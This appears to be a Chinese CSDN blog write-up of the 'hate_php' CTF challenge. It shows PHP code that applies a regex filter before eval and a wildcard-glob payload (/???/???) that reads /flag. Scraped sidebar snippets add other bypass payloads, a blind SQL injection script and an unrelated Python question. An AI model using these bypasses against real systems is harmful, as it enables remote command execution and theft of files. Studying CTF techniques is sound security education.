-Web-hate_php

于 2024-06-29 20:11:23 发布
阅读量164 收藏 3
点赞数 5
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80113257/article/details/140069795
版权

复制代码

<?php
error_reporting(0);
if(!isset($_GET['code'])){

highlight_file(__FILE__);
}else{

$code = $_GET['code'];
if(preg_match("/[A-Za-z0-9_$@]+/",$code)){

die('fighting!');
}
eval($code);
}

复制代码

代码审计后,发现对输入code进行了正则表达式匹配,过滤了英文大小写字母、数字和_$@三个特殊字符。

本题的关键就是绕过正则匹配,执行eval()函数。

解题思路:

  • 利用通配符调用Linux系统命令来查看flag
  • 在Linux系统中可以使用 ? * 等字符来正则匹配字母
  • 星号(*)可以用来代替0个及以上任意字符
  • 问号(?)可以用来代替1个任意字符,比如 /???/??? => /bin/cat

首先,构造payload如下:

?><?=`/???/???%20/???/???/????/*`?>
php使用短链接含义如下:
<?php echo `/bin/cat /var/www/html/index.php`?>

读取到源码发现存在如下函数(我没找到?):

function getFlag(){

$flag = file_get_contents('/flag');
echo $flag;
}

最后直接读取flag文件。

?code=?><?=`/???/??? /????`?>
php使用短链接含义如下:
<?php echo `/bin/cat /flag`?>
雪儿超人
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第五空间 hate_php
weixin_53955759的博客
09-30 1638
打开环境源码如下 正则匹配过滤了flag . p h / ; " ' ` | [ ] _ 绕过正则匹配的方法可以用两次取反urlencode编码来绕过它 看了wp,在php7以后可以用($a)();来执行函数 它会先执行($a)里面的函数,之后在执行();里的函数 那么就用highlight_file来返回flag.php的内容 ...
【CTFhub】——hate_php2021
manerzi的博客
11-02 1277
【CTFhub】——hate_php2021
ctfhub hate_php
m0_57954651的博客
11-15 357
闭合前面的php 同时执行我们后面构造想要执行的内容。首先进行了一个正则匹配 过滤掉了A~Z的26个字母大写 a ~ z的26个字母小写 0 ~9这十个数字。preg_match函数。我们需要构造语句绕过。
【CTFHub】hate_php 2020 函数绕过
manerzi的博客
11-03 782
【CTFHub】hate_php 2020 函数绕过
CTFHUB web-hate_php
m0_57954651的博客
09-05 1475
打开题目 一篇代码 先进行代码审计 看到PHP正则表达式 preg_match 显然在传参时 它会进行过滤 过滤后面括号中的关键字和特殊符号 第二个正则表达式也会过滤PHP的内置函数 即使我们找到了某个函数恰好可以绕过第一个 但也过不去第二个过滤 函数 get_defined_functions 所以这里我们利用异或或者取反来绕过 一般flag文件都会存放在根目录下 但是这里我们知道在哪 所以尝试一下 使用print_r函数 进行目录扫描 利用在线
twitter_hate_detector-app
04-01
Python在数据科学、机器学习和Web开发等领域非常流行,因为它有丰富的库和简洁的语法,适合快速开发。 【压缩包子文件的文件名称列表】"twitter_hate_detector-app-master" 这个文件名暗示这是一个GitHub仓库的克隆...
twitter_hate_speech
03-06
twitter_hate_speech 已实施的端到端自然语言处理项目将目标仇恨言论与仅包含令人讨厌的单词的言论区分开来。 从数据清理,特征提取(单词包,nGrams,TF-IDF BOW,word2vec嵌入),特征选择和建模。 使用word2vec ...
opensource-hate:讨厌开源
04-15
Yii框架是我正在维护的最受欢迎PHP框架之一,在GitHub上有超过13K的明星和全世界的许多用户在使用它。 如此出色的采用扩大了OpenSource维护者正在收到的通常的反馈。 当然,会有“谢谢”消息,但是作为维护者,您...
Stop_Hate_For_Profit
02-14
同时,为了确保网站的可访问性和适应性,可能还涉及到Web标准、响应式设计以及无障碍(WCAG)指南的应用。 此外,运动的参与者可能还需要了解社交媒体平台的API(Application Programming Interface),以便于自动...
NLP_hate_speech
03-29
在“NLP_hate_speech”这个主题中,我们聚焦于一个具体的应用:识别和处理网络上的仇恨言论。仇恨言论是指在社交媒体、论坛和其他在线平台上表达的针对特定个人或群体的恶意、歧视性或攻击性的言论。 在这个项目或...
Build APIs You Won't Hate
01-03
Build APIs You Won't Hate,教你如何构建优美的API,让你的API简单易懂!
2020第五空间 hate-php rosb 交流
Rashu99's blog
06-27 2244
hate-php 取反绕过对字母和数字的过滤 php在线运行 <?php echo urlencode(~'highlight_file'); //%97%96%98%97%93%96%98%97%8B%A0%99%96%93%9A echo "\n"; echo urlencode(~'flag.php'); //%99%93%9E%98%D1%8F%97%8F ?> /?code=(~%97%96%98%97%93%96%98%97%8B%A0%99%96%93%9A)(~%99%9
2021-第五届世界智能大会-「津门杯」国际网络安全创新大赛-Web-hate_php
weixin_40872714的博客
03-29 2503
2021-第五届世界智能大会-「津门杯」国际网络安全创新大赛-Web-hate_php 打开网址直接告诉你过滤的代码,把字母数字和$、_、@都过滤了,直接放弃 然后百度搜了这道题的答案,感觉发现了新大陆一样,下面是相关的几篇文章,强烈推荐阅读: 过滤了大写字母和数字的绕过方法: https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html 过滤了大小写字母、数字、‘$’和‘_’ https://www.leavesongs.co
[RoarCTF 2019]Easy Calc
weixin_42346836的博客
10-16 396
查看源码发现有一个页面,直接访问 源码: <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^']; foreach ($blacklis
CTFHUB历年真题练习
qq_51558360的博客
10-11 1348
WebsiteManger 考点 布尔盲注、SSRF 尝试了一般登录方法没有反应。查看源码发现sql注入的利用点在图片上 盲注脚本 import string from requests import * allstr = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\]^_`{|}~' myurl = 'http://challenge-1993b
津门杯wp
qq_53755216的博客
06-06 250
hate_php <?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if(preg_match("/[A-Za-z0-9_$@]+/",$code)){ die('fighting!'); } eval($code); } 一道命令执行题目
津门WP
qq_51425032的博客
05-12 510
津门杯WP 前言:由于津门和红帽俩比赛撞在一起,就顺便和队友一起打了,但后面专门去红帽了,自己还是好菜,前面的都全A了 web1 power_cut 打开后显示:昨天晚上因为14级大风停电了. 猜测跟意外关闭后生成的备份文件相关,访问http://119.3.128.126:32800/.index.php.swp 获得文件,vim -r恢复得到源码: <?php class logger{ public $logFile; ​ public $initMsg; ​ public $
【第五空间智能安全大赛】web hate-php
weixin_45844670的博客
09-13 715
进入题目链接 得到源码 <?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { die('You are too good for me');
2021津门杯web部分复现
1ance's blog
05-17 962
Web 1、power_out 通过分析(停电)可以知道可能是有备份文件或者编辑器异常退出时保存的记录。 扫描目录或者查看常见的目录 vim编辑器备份文件 .index.php.swp(找到文件下载) .index.php.swo .index.php.swn 发现乱码 b0VIM 7.4  o慲? 4  root 7fa16b649c4b /var/www/ht
请帮我检查如下代码,检查为什么在cmd中命令pyinstaller thatname.py后,成功打包为一个程序,但是程序运行时可以输入数据,但是没有数据输出?import random # 1数据段:这里的数据段输入以32.5-40.7这样的数据形式进行,目前设计是输入一个数据段,这里应当考虑使用什么方法再不用大幅度调整代码 # 的情况下就可实现多个数据段输入,总之先实现单个输入的结果数据,打通程序运行逻辑。 def fun(): range_in = input('请以33.5-42.888这种样式输入数据段(或者其他字符进行分隔):') range_lis = range_in.split('-') range_num = [] for i in range_lis: range_num.append(float(i)) range_num = tuple(range_num) print(range_num) # 2厌烦点 hate_point = float(input('请输入厌烦点(单位M):')) # 3筛选宽度 width = float(input('请输入筛选宽度(单位M):')) # 4筛选期望数 hop = int(input('请输入筛选期望次数:')) # 5输出结果 out_list = [] # 下面进行宽度、数据段、厌烦点的合理性验证,即保证宽度<被厌烦点分隔的数据段中的最小值 if width < hate_point - range_num[0] or width < range_num[1] - hate_point: print('数据逻辑符合') while len(out_list) < hop: out = random.uniform(range_num[0], range_num[1]) # out是在数据段中随机筛选出的一个点,下面对这个点进行验证 if out + width <= range_num[1] and not (out <= hate_point <= out + width): out_list.append((out, out + width)) print(f'{out}-{out + width}') else: continue print(out_list) else: print('数据逻辑不符合,无法随机出符合要求的期望值') if __name__ == '__main__': fun()
最新发布
05-31
这段代码在打包为程序后没有输出结果的原因可能是因为程序没有正确输出结果到命令行窗口。你可以尝试添加以下代码将结果输出到命令行窗口中: ```python # 5输出结果 out_list = [] # 下面进行宽度、数据段、厌烦点的合理性验证,即保证宽度<被厌烦点分隔的数据段中的最小值 if width < hate_point - range_num[0] or width < range_num[1] - hate_point: print('数据逻辑符合') while len(out_list) < hop: out = random.uniform(range_num[0], range_num[1]) # out是在数据段中随机筛选出的一个点,下面对这个点进行验证 if out + width <= range_num[1] and not (out <= hate_point <= out + width): out_list.append((out, out + width)) print(f'{out}-{out + width}') else: continue print(out_list) else: print('数据逻辑不符合,无法随机出符合要求的期望值') ``` 这样可以保证程序在正确输出结果的同时,将结果输出到命令行窗口中。如果仍然无法输出结果,你可以尝试检查程序的逻辑是否正确,以及程序是否有异常抛出。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值